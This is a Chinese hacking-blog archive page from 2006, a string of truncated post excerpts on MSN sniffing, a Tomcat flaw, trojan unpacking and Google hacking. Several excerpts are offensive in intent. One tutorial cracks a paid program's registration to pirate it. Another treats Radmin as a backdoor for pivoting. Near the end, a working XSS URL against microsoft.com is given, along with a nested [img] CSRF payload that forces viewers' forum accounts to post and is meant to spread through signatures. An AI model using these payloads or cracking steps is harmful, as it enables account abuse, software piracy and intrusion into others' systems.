任何一个普通人,只要安装一款随处可以下载的软件,就能在网上“偷窥”本地局域网内所有人的MSN聊天记录。一种可对同局域网其他MSN用户对话实施监听的软件———“局域网MSN消息监听器”被某网络媒体曝光后,在国内立即引发下载热潮。尽管是一款国外开发的收费软件,但昨天通过百度搜索已能寻找到超过25000个相关的网页下载链接,其中绝大部分都可以提供破解和汉化后的版本使用。 昨天,记者就此事采访了微软中国的相关工作人员。据介绍,这款软件的确可以“偷窥”局域网聊天内容,但成功与否取决于网络因素。“这一工具实际上是个抓包工具,理论上所有网络的数据包都可以被捕捉到。”
对于MSN用户的聊天很轻易就被局域网其他人监控,微软并未给出直接的回答。微软称,已经在Messenger中集成了微软认证的加密聊天解决方案。用户可以方便、直接地从聊天窗口中开启“悄悄话”的服务功能,进行加密聊天。操作如下:
1.在对话框中点击“查看活动列表”功能。
2.选择“悄悄话”功能,邀请对话方使用加密服务。
3.届时, 在双方对话框的右侧将出现新的对话区域“悄悄话”。
不过MSN产品负责人也提示,作为一款即时通信软件,微软建议用户不要在即时聊天对话中发送诸如密码、信用卡号码等保密信息。如果确有必要发送保密信息,可以选择使用电子邮件或者加密聊天解决方案。
该人士还称,对于有更高安全需求的企业,可以选择高可靠性的企业实时通讯服务器Live Communication Server。【转自
Archive for 七月, 2006
ps:这个漏洞貌似很久以前就有了吧!而且还有人用这个黑过不少知名站点!现在才发布出来!
受影响系统:
Apache Group Tomcat 5.5.9Apache Group Tomcat 5.5.7Apache Group Tomcat 5.5.12Apache Group Tomcat 5.0.28不受影响系统: Apache Group Tomcat 5.5.17描述:…
文章作者:混世魔王 QQ:26836659信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
首发于《黑客防线》杂志骗钱,高手略过。
终于拿到了黑防的杂志,里面有一款“SQL格式化工具”,居然要花50RMB注册,虽然可以试用,但还是觉得很不爽,于是继续我的作风,支持盗版. 先查壳,Borland Delphi 6.0 – 7.0 编写。建议初学的话用Dede3.5 分析Delphi 程序。先看程序,随便输入KEY,就会提示说“非法注册号”,一般我们根据他的错误提示,用OD就可以找到他的错误信息,在出错附近就可以找到他的关键跳,也就是常说的“暴点”.0062AC30 |. E8 57C6FFFF …
文章作者:混世魔王 QQ:26836659信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
注意:本文已经发表于《黑客防线》杂志骗钱,高手略过,有不足,还望指点。
看了《黑客防线》的官方通告,6期光盘的本月强档栏目中,动网漏洞利用动画所附带的工具会使杀毒软件报Jing,提示为Trojan-PSW.Win32.QQShou.ed。一想,我老魔算黑的了,居然还有比我更黑的。看来是青出于蓝……于是把这个恶意程序分析了一下,算是给自己增强手动超作的经验,也帮中了马的朋友们,把他清理的干干净净。先PEID查壳,UPX 0.89.6 – 1.02 / 1.05 – 1.24 -> Markus & Laszlo [Overlay],网上n多脱壳机,我这就不去DOWN,直接用PEID的UPX FILEINFO的插件,就可以轻松的获得UPX加壳程序的OEP。
这里OEP 为:4056D8 直接OD载入.F4,到4056D8把他DOWN 出来。脱壳就完毕了.再用PEID一查,Borland Delphi…
Netsnow测试出来的东东:俺发现的一个直接暴绝对路径的地方:
信息来源:安全焦点作者:grassgrass (kityest_at_163.com)
Radmin服务端保持连接不断问题分析与解决作者: grassgrassEmail: kityest@163.com1、问题描述 Radmin是一个绝佳的远程控制软件,用来做跳板的后门再好不过了,不过每次连过跳板后,察看跳板连线,可以仍然看见我们和跳板上Radmin的连接,只不过显示为TIME_WAIT,且一直这样。Proto …
http://www.webshell.cn/
引用:你丫在loveshell发的 "嘎嘎!rose,你给劳资小心点!他妈的你以为自己是啥?有本事把劳资的站给干掉~! http://www.webshell.cn 我就等你rose来黑,你黑不了你就是劳资孙子!,懂? 还有,剑心同志,俺想问问, Discuz官方被黑的漏洞是谁告诉你的? 嘎嘎!如果没人告诉你,难道是你自己发现的? 呵呵,那就奇怪了!那为什么你早不发现而要等我发现Discuz漏洞动画发布之后,你就黑了Discuz官方站! 嘎嘎!我竟然发现你的方法和我的一样,难道…" rose那丫的估计木哪个水平来黑你! 你丫知道dz是怎么被干的吗,真tnnd的纳闷,什么鸟人都有! hacked by 9xiao 2006.7.29
作者:superhei
就是读取google搜索某一关键词后,结果页内的所有连接,列了出来,一目了然。
<? if(empty($query))$query="site:www.ph4nt0m.org"; if(empty($num))$num="100"; ?> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>Google Hacking</title> <style type="text/css"> body,td { font-family: "Tahoma"; font-size: "12px";…
信息来源:鬼仔blog测试代码:
http://www.microsoft.com/education/Tutorials.mspx?Act=Tutorials.mspx&Xslt=%2Fbusiness%2FXSLT%2FTutorialsResults_0405.xslt&Op1=%3Cscript%3Ealert(document.cookie)%3C/script%3E&Op2=all&Op4=all&SearchSubmit=Search
效果图:
HOHO..大半夜的..在红狼群里..风雪残士 发了一个很好玩的贴..俺就去看了下..结果就以自己的名义自动发贴了…感觉和我投稿X的那篇动网的文章一样
利用代码
程序代码:
[img]http://bbs.cnworms.com/wap/post.php?action=new&fid=6&subject=Candy是个大美女&content=Candy是个大美女.很可爱哦[img]http://bbs.cnworms.com/wap/post.php?action=new&fid=6&subject=Candy是个大美女&content=Candy是个大美女.很可爱哦[/img][/img]
另外我测试发现..可以把以上代码写到个人签名里….这样只要别人看了你资料或者看了你回复的任何贴都会自动发贴滴~~~更多效果在进一步研究中
纯属无聊之作…消遣之用…